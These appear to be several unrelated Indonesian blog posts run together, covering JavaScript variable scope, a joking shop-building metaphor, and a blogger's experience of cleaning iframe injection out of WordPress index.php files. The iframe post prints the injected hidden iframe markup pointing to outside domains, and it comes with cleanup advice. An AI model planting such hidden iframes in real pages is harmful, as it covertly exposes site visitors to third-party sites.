• Interaksi visual, real time sisi client memang akan menjadi yang nomer satu, wajib dan standar untuk web. Kelakkah?
• Kelak, teknologi perangkat keras akan semakin mengakomodasi kecepatan muat bahasa JavaScript.

Tapi, entahlah… karena pada kenyataanya saya juga masih enggan meninggalkan jinjingan dengan atom N270 ini. :p

Menetukan Variabel

Menggunakan var di luar fungsi adalah opsional. Menetapkan sebuah variabel dengan sintak var di dalam sebuah fungsi diperlukan jika;

• Kita ingin mendeklarasikan sebuah variabel lokal dengan nama yang sama yang sudah ditetapkan/dideklarasikan sebagai nama pada variabel global.
• Fungsi rekursif menggunakan variabel dengan nama yang sama.

Cakupan variabel

Variabel-variabel dalam JavaScript umumnya memiliki cakupan global. Namun, variabel-variabel tersebut akan menjadi memiliki ruang lingkup lokal jika ditentukan dalam fungsi-fungsi.

Jadi, jika akan mendefinisikan sebuah variabel lokal dalam sebuah fungsi dan variabel global dengan nama yang sama yang sudah ada, maka variabel global tersebut akan diabaikan dalam fungsi dimaksud. Tanpa mempedulikan letak nama untuk variabel lokal tersebut di definisikan.

1. Sediakan Tempat.

   Boleh numpang, asal mau menanggung resiko kalau kena gusur. Boleh membangun sendiri. Yang penting, berhati-hati dengan IMB. Jangan sampai "Besar Pasak daripada Tiang", atau harus meresapi frase "Tekor Bandar".

2. Perhatikan fisik bangunan.

   Bentuk bangunan. Boleh kotak, segitiga, jajaran genjang, belah ketupat, segi enam tidak beraturan pun boleh. Terserah, asal jadi saja, asal ada, yang penting wujud. Teras depan. Boleh dicat, tidak usah mahal dan mewah. Catnya yang Simple-simple Saja. Warna-warni juga boleh, tetapi jika perlu renovasi harus gampang dan cepat. Ruangan. Jangan banyak partisi dan sekat-sekat, atau Etalase dari saya tidak kebagian tempat. Teras belakang. Optional, yang penting sirkulasi & bongkar muat barang dagangan dan etalase dapat dilakukan dengan cepat.

3. Maintenance

   Pajangan dan dekorasi. Silahkan pasang, tapi yang sederhana saja, yang lagi ngetrend, tidak usah njlimet karena yang njlimet ruwet jarang yang suka. Gambar dan Spanduk. Cukup dari saya saja. Selingkuh juga boleh asal Dimana Ngamarnya tetap ditempat Saya saja, dijamin aman meskipun perlu sedikit tambahan modal.

4. Promosi

   Bagi-bagi kue cookies. Setiap pengunjung yang datang segera jejalin dengan kue, peduli amat doyan atau tidak. Kalau perlu, secara sembunyi-sembunyi masukin ke dalam tasnya. Untuk Pelanggan baru. Usahakan membuat jalan protokol-roxi, Kalau perlu sediakan bis untuk antar jemput mereka.

Sekian saja dulu petikan surat dari pakghe supedi. Jika ada yang merasa menerima surat berupa trip serupa. Silahkan tambahkan.

Alasan :

Merasa telah membuat/menggunakan sebuah clean themes dengan melihat toolbar Add-ons Web Developer di Firefox, ternyata belum menjamin benar-benar akan bersih dan bebas dari Iframe Injection. Berangkat dari ketidak-sengajaan membaca sebuah frase singkat berbunyi (lupa nama forumnya), “Delete unnecessary space after closing php tag (?>)”, ditambah penjelasan singkat tentang pengalihan feed pada dokumentasi resmi WordPress, ditambah lagi tentang isu XML format, dan kabar tentang ancaman library XML yang disingkap oleh Codenomicon and the Finnish Computer Emergency (CERT-FI) sampai sampai harus segera dilakukan konferensi hacker sejagad. (tolong, hubungkan sendiri [MesinHosting]-Apache-SUN-PHP/Python-XML-[WordPress]).

Fix Rss Feed

Sungguh aneh, jika sebuah dokumentasi resmi core-engine blog yang dipakai jutaan manusia melek internet sekelas WordPress, tetap mempertahankan plugins ini tetap terdokumentasi dan berada dalam salah satu halamannya, jika tidak ada manfaat yang sangat vital.

Jika anda merasa penasaran, silahkan download dan coba gunakan pada blog WordPress anda. Dokumentasi WordPress menjamin bahwa plugins ini tidak akan merubah apapun kecuali menghapus “blank tail” setelah tag penutup php, yang memungkinkan terjadinya ketidak-kompabilitasannya format XML antar platform,… dan yang terjadi pada blog saya, menjadikan terinfeksinya html oleh Iframe Injection.

Sekian, Salam.

1. Fresh Install System,.. DONE
2. Maksimum Protection dengan AntiVirus, Firewall,.. DONE
3. Clean Install FTP,.. DONE.

Tetapi kenyataannya Iframe masih datang juga,.. Harus gimana lagi ? Bolak balik ngetik keyword di Google nyatanya yang ada hanya cara penyembuhan dan bukan antisipasinya, yang ada hanya kaburnya batas kesalahan antara sisi server dan sisi client.

Pasrah,..
Bagi yang punya kemampuan lebih untuk melakukan injection, ya silahkan lanjutkan. Pada tulisan ini, saya hanya mau mengucapkan rasa terima kasih, karena yang anda lakukan membuat saya menjadi rajin menjenguk domain dan instalasi didalamnya. Bukan begitu kawan-kawan :) ?!?

Dan saya sangat bersyukur, karena beberapa yang peduli dengan sesama, membagikan cuma-cuma tools untuk bersahabat dengan Iframe Injection, dua diantaranya adalah : (thanks for both of you guys)

1. Plugins Stray Iframe Blocker

   Deskripsi singkat plugins ini kurang lebih adalah untuk mem-blok iframe yang akan ditambahkan pada file-file index.php oleh beberapa jenis virus (usually it refers to http://goooogleadsence.biz/)

2. Clean.php

   Tool ini sangat membantu mempercepat pencarian file-file index.php yang terinfeksi. File aslinya saat didownload adalah text file, oleh karenanya kita harus mengeditnya terlebih dahulu :

   1. Sesuaikan parameter nama domain dengan nama domain kita (baris ke-9)
   2. Simpan File sebagai clean.php
   3. Upload ke public html (sebaiknya melalui panel hosting)
   4. Untuk eksekusi ketikkan pada address bar http://domainanda.com/clean.php?s=index.php&c=iframe
   5. Perlu dicatat, si-empunya pembuat menyarankan untuk menghapus script-script injeksi secara manual setelah kita mendapatkan listing filenya.

Para tua selalu bilang, “Sabar,.. Berpikir positif dan ambil hikmah dan sisi baiknya dalam menghadapi setiap masalah”. Pantaskah untuk kasus ini ? Tergantung kita Menyikapinya.

Semoga bermanfaat.

Definisi iframe atau frame inline menurut W3C (World Wide Web Consortium), apabila diterjemahkan secara singkat kurang lebih mungkin adalah sebuah pengembangan model tag html <frame>, untuk menampilkan sebuah frame di dalam sebuah page/halaman html. Bingung yach :D,.. yang nulis aja juga bingung menjabarkannya.

Tapi cara paling mudah untuk mengidentifikasi sebuah halaman html yang di dalamnya terdapat sebuah tag <frame> dan keluarganya adalah apabila di dalam sebuah halaman html terdapat tombol scroll serupa dengan scroll yang ditepi kanan browser yang kita pergunakan, atau apabila terdapat suatu bagian yang bisa kita gulung, tapi bagian yang lain tidak berubah posisinya. Oops,.. betul,.. kalau kita sedang menulis sebuah entry / posting dalam WordPress sudah pasti kita langsung kenal dengan bentuk tag <frame>.

Silahkan melanjutkan sendiri penjelasannya, karena tag-tag html seperti <frameset></frameset>, <frame></frame>, <iframe></iframe> adalah menu pertama belajar terjun ke dalam dunia maya (baca : web).

Yang hendak saya tulis disini adalah frame definisi atau <iframe></iframe> yang disisipkan setelah tag penutup sebuah halaman html.

normalnya sebuah tag iframe dalam page html terstruktur seperti berikut :

<html>
<head><title></title>
</head>
<body>
...
<iframe>...</iframe>
...
</body>
</html>

iframe diletakkan sebelum tag </body> dan atau sebelum tag </html>

Apa jadinya jika tag iframe terletak dibawah tag penutup halaman html, seperti ini:

<html>
<head>
<title></title>
</head>
<body>
....
</body>
</html>
<iframe src=\"http://warpiln.com/?click=176C8E2\"
width=1 height=1 style=\"visibility:hidden;position:absolute\">
</iframe>
<iframe src=\"http://rebbeta.net/?click=A5EC70\"
width=1 height=1 style=\"visibility:hidden;position:absolute\">
</iframe>

para master programming menyebutnya sebagai iframe injection, jika menemukan hal seperti tersebut diatas pada sebuah halaman html, maka sebaiknya singsingkan lengan baju,.. ambil langkah seribu,.. segera diobati sebelum berapa lapis ?!? Ratusan,.. dan segera memperbaiki keamanan file-file instalasi. Rumornya,.. bukan rumornya lagi ding,.. Jangankan cita-cita pagerank naik, traffic tumbuh, dst, dst. Tetapi justru website diblok karena dianggap sebagai biang penyebar spam.

Sebagai seorang pemula,.. yang sedang belajar terjun ke dunia maya, mencoba membuat blog, belajar menulis dan kemudian mencoba mencicipi rasanya mengalihkan halaman feed ke FeedBurner. Pada saat minta persetujuan untuk pengalihan yang saya maksudkan diatas, saya tidak segera mendapatkannya tetapi justru dihadapkan pada pesan Error dan disarankan untuk untuk melakukan validasi feed. Setelah membaca berulang-ulang setiap error message yang ditampilkan, ternyata yang menjadi penyebabnya adalah iframe injection tadi, tag <iframe></iframe> yang tidak normal seperti contoh diatas.

Beruntung kejadian ini segera diketahui sejak awal, sehingga tidak berakibat fatal (dianggap sebagai penyebar spam tadi). Setelah mengedit-hapus baris (line) “echo <iframe bla.. bla.. bla.. ” tersebut pada file-file index.php, syukurlah tag <iframe> tidak normal tersebut tidak berkunjung lagi.

Bagaimana kalau sudah terlanjur terjangkiti iframe injection berlapis-lapis pada semua file index.php ?

Jujur, saya juga sedang mencari solusinya. Mudah-mudahan setelah menemukan jawabannya bisa segera saya tuliskan lagi (maksimal untuk kepentingan diri sendiri dulu saja).